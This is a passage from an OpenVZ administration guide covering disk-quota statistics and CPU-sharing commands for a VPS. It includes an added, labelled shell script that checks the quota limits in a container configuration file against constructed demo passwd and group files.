To check the quota stats do the following operation in the host server.

# vzquota stat 102 -t
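
A consistency check for the quota parameters of section 6.2, added here as an example and not part of the original guide or of the OpenVZ tools: it reads a VPS configuration file as text, confirms that each soft:hard pair is ordered, and compares QUOTAUGIDLIMIT with the line counts of the passwd and group files. Comparing the limit with each file separately follows the guide's own example (55 and 66 entries, limit 100) and is an assumption; the function names and the demo files are constructed.

```shell
#!/bin/sh
# Added example: sanity-check the quota settings of one VPS configuration file.

# conf_get FILE KEY: value of KEY="value", read as text (the file is not sourced)
conf_get() {
    sed -n "s/^$2=//p" "$1" | tail -n 1 | tr -d '"'
}

is_uint() { case "$1" in ''|*[!0-9]*) return 1 ;; esac; }

# check_ve_conf CONF PASSWD GROUP: print problems, return 1 if any were found
check_ve_conf() {
    conf=$1; passwd=$2; group=$3; status=0
    for key in DISKSPACE DISKINODES; do
        val=$(conf_get "$conf" "$key")
        soft=${val%%:*}; hard=${val##*:}
        if ! is_uint "$soft" || ! is_uint "$hard"; then
            echo "BAD $key: expected soft:hard, got '$val'"; status=1
        elif [ "$soft" -gt "$hard" ]; then
            echo "BAD $key: soft limit $soft is above hard limit $hard"; status=1
        fi
    done
    ugid=$(conf_get "$conf" QUOTAUGIDLIMIT)
    is_uint "$ugid" || ugid=0
    if [ "$ugid" -gt 0 ]; then          # 0 means second-level quotas are off
        for f in "$passwd" "$group"; do
            n=$(wc -l < "$f" | tr -d ' ')
            if [ "$ugid" -lt "$n" ]; then
                echo "BAD QUOTAUGIDLIMIT: $ugid is below the $n entries in $f"
                status=1
            fi
        done
    fi
    return $status
}

# Constructed demo: swapped inode limits and a UGID limit below the group count.
make_demo_ve() {
    d=$(mktemp -d)
    cat > "$d/102.conf" <<'EOF'
DISKSPACE="1000000:1100000"
DISKINODES="91000:90000"
QUOTATIME="600"
QUOTAUGIDLIMIT="60"
EOF
    i=0
    while [ "$i" -lt 55 ]; do
        echo "user$i:x:$i:$i::/home/user$i:/bin/sh"; i=$((i + 1))
    done > "$d/passwd"
    i=0
    while [ "$i" -lt 66 ]; do
        echo "group$i:x:$i:"; i=$((i + 1))
    done > "$d/group"
    echo "$d"
}

demo=$(make_demo_ve)
check_ve_conf "$demo/102.conf" "$demo/passwd" "$demo/group" || echo "problems found"
rm -rf "$demo"
```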

6.3 CPU Sharing

We can set up the cpu utilization of a vps as follows.

# vzcpucheck

# vzctl set 102 --cpuunits 1500 --cpulimit 4 --save

# vzctl restart 102